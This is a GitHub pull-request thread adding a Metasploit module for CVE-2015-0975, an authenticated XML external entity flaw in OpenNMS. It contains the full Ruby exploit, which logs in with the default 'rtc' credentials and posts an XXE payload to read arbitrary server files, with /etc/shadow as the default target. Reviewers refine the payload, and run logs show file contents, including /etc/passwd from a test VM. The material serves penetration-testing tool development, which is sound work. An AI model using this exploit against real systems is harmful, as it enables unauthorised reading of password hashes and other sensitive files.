Add CVE-2015-0975 XXE for OpenNMS <= 14.0.2

[jstnkndy]

This Metasploit module exploits an authenticated xxe vulnerability in OpenNMS versions prior to 14.0.3. Here is this module in action:

msf auxiliary(opennms_xxe) > show options

Module options (auxiliary/test/opennms_xxe):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILEPATH   /etc/shadow      yes       The file or directory to read on the server
   PASSWORD   rtc              yes       The password to authenticate with
   Proxies                     no        Use a proxy chain
   RHOST                       yes       The target address
   RPORT      8980             yes       The target port
   SSL        false            no        Use SSL
   TARGETURI  /opennms/        yes       The base path to the OpenNMS application
   USERNAME   rtc              yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

msf auxiliary(opennms_xxe) > set rhost 172.16.2.142
rhost => 172.16.2.142
msf auxiliary(opennms_xxe) > set filepath /root/secret_document.txt
filepath => /root/secret_document.txt
msf auxiliary(opennms_xxe) > run

[*] Logging in to grab a valid session cookie
[*] Got cookie, going for the goods
[+] "Plans for world domination"
[*] Auxiliary module execution completed

As this is my first pull request, feedback is very much welcome!

[OJ]

Very cool first contribution! Well done 👍

[OJ]

Is it worth randomising foo and xxe per-request? Also, do you have to worry about encoding/escaping characters in the file path?

[jstnkndy]

I do think the randomized foo and xxe per-request is a good idea, how does the following code look:

    rand_doctype= Rex::Text.rand_text_alpha(rand(1..10))
    rand_entity1 = Rex::Text.rand_text_alpha(rand(1..10))
    rand_entity2 = Rex::Text.rand_text_alpha(rand(1..10))

    xxe = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE '+rand_doctype+' [ <!ELEMENT '+rand_entity1+' ANY ><!ENTITY '+rand_entity2+' SYSTEM "file://'+datastore["FILEPATH"]+'" >]><'+rand_entity1+'>&'+rand_entity2+';</'+rand_entity1+'>'

We don't have to worry about encoding/escaping characters in the filepath

[OJ]

Yup, that kind of thing looks good. If the XML doesn't have to be on a single line you might like to do it this way:

xxe = %Q^
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE #{rand_doctype} [
    <!ELEMENT #{rand_entity1} ANY >
    <!ENTITY #{rand_entity2} SYSTEM "file://#{datastore["FILEPATH"]}" >
]>
<#{rand_entity1}>&#{rand_entity2};</#{rand_entity1}>
^

[jstnkndy]

These are all great points @OJ, I'll make some modifications after work :)

[jvazquez-r7]

ping @jstnkndy, you interested in finish it?

In addition to the excellent @OJ review, since it is an auxiliary module, it should live under the "auxiliary" tree, for example "auxiliary/gather/" looks like a better location for this module, thanks!

[jstnkndy]

Hey @jvazquez-r7 , I do, I've just been busy with work stuff lately, more travel than usual. I'll try to get to it in the next two weeks! Thanks!

[jvazquez-r7]

Thanks @jstnkndy for the update! no prob, marking it as delayed so you have time to finish it :-) thanks!

[bcook-r7]

@jstnkndy, do you need help addressing things here, or should we move to unstable?

[jstnkndy]

Here's what I've ended up with with updates, let me know if I should update my PR:

require 'msf/core'
require 'openssl'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'OpenNMS Authenticated XXE',
      'Description'    => %q{
      OpenNMS is vulnerable to XML External Entity Injection in the Real-Time Console interface.
      Although this attack requires authentication, there are several factors that increase the
      severity of this vulnerability.

      1. OpenNMS runs with root privileges, taken from the OpenNMS FAQ: "The difficulty with the
      core of OpenNMS is that these components need to run as root to be able to bind to low-numbered
      ports or generate network traffic that requires root"

      2. The user that you must authenticate as is the "rtc" user which has the default password of
      "rtc". There is no mention of this user in the installation guides found here:
      http://www.opennms.org/wiki/Tutorial_Installation, only mention that you should change the default
      admin password of "admin" for security purposes.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Stephen Breen <breenmachine[at]gmail.com>', # discovery
          'Justin Kennedy <jstnkndy[at]gmail.com>', # metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2015-0975']
        ],
      'DisclosureDate' => 'Jan 08 2015'
    ))

    register_options(
      [
        Opt::RPORT(8980),
        OptBool.new('SSL', [false, 'Use SSL', false]),
        OptString.new('TARGETURI', [ true, "The base path to the OpenNMS application", '/opennms/']),
        OptString.new('FILEPATH', [true, "The file or directory to read on the server", "/etc/shadow"]),
        OptString.new('USERNAME', [true, "The username to authenticate with", "rtc"]),
        OptString.new('PASSWORD', [true, "The password to authenticate with", "rtc"])
      ], self.class)

  end

  def run

    res = send_request_raw({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
      })

    fail_with("Connection failed at initial GET request") if res.nil?

    print_status("Logging in to grab a valid session cookie")

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'j_spring_security_check'),
      'vars_post' => {
        'j_username' => datastore['USERNAME'],
        'j_password' => datastore['PASSWORD'],
        'Login'=> 'Login'
      },
    })

    if res.nil?
      fail_with("No response from POST request") 
    elsif res.code != 302
      fail_with("Non-302 response from POST request")
    end

    unless res.headers["Location"].include? "index.jsp"
      fail_with(Failure::Unknown, 'Authentication failed')
    end

    cookie = res.get_cookies

    print_status("Got cookie, going for the goods")

    rand_doctype= Rex::Text.rand_text_alpha(rand(1..10))
    rand_entity1 = Rex::Text.rand_text_alpha(rand(1..10))
    rand_entity2 = Rex::Text.rand_text_alpha(rand(1..10))

    xxe = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE '+rand_doctype+' [ <!ELEMENT '+rand_entity1+' ANY ><!ENTITY '+rand_entity2+' SYSTEM "file://'+datastore["FILEPATH"]+'" >]><'+rand_entity1+'>&'+rand_entity2+';</'+rand_entity1+'>'

    res = send_request_raw({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'rtc', 'post/'),
      'data' => xxe,
      'cookie' => cookie
    })

    # extract filepath data from response and remove preceding errors

    if res and res.code == 400 and res.body =~ /<title.*\/?>(.+)<\/title\/?>/m
      title = $1
      result = title.match(/"(.*)/m)
      print_good("#{result}")
    end

  end
end

[OJ]

Thanks again for your work here @jstnkndy! Sorry I commented on outdated stuff. Just make the changes to your PR branch, then commit and push. The PR will update automagically.

[jstnkndy]

I'm terrible with github, hopefully those updates are now reflected in the PR :)

[bcook-r7]

It updated correctly!

[OJ]

Holy smokes, getting/installing/setting up a version of OpenNMS that's vulnerable is painful. @jstnkndy when we meet, you're buying the first beer 😛

[jstnkndy]

I find it often takes longer to install software properly than to find vulnerabilities in it. I'll buy the first two rounds @OJ!

[OJ]

Hey @jstnkndy I've done a couple of fixes/changes here jstnkndy#1

When you've merged, I'll land :)

[OJ]

Thanks @jstnkndy ! Great contribution mate.

[OJ]

Forgot to include sample output:

msf auxiliary(opennms_xxe) > rexploit
[*] Reloading module...

[*] Logging in to grab a valid session cookie
[*] Got cookie, going for the goods
[+] root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false colord:x:102:105:colord colour management daemon,,,:/var/lib/colord:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false lightdm:x:104:108:Light Display Manager:/var/lib/lightdm:/bin/false
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:106:113:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/home/usbmux:/bin/false kernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:109:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:110:122:RealtimeKit,,,:/proc:/bin/false
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh hplip:x:112:7:HPLIP system user,,,:/var/run/hplip:/bin/false
saned:x:113:123::/home/saned:/bin/false oj:x:1000:1000:oj,,,:/home/oj:/bin/bash
whoopsie:x:114:125::/nonexistent:/bin/false postgres:x:115:126:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash 
[*] Auxiliary module execution completed

Yup, that's /etc/passwd from a dodgy VM.. have at me, hackers!

Peace!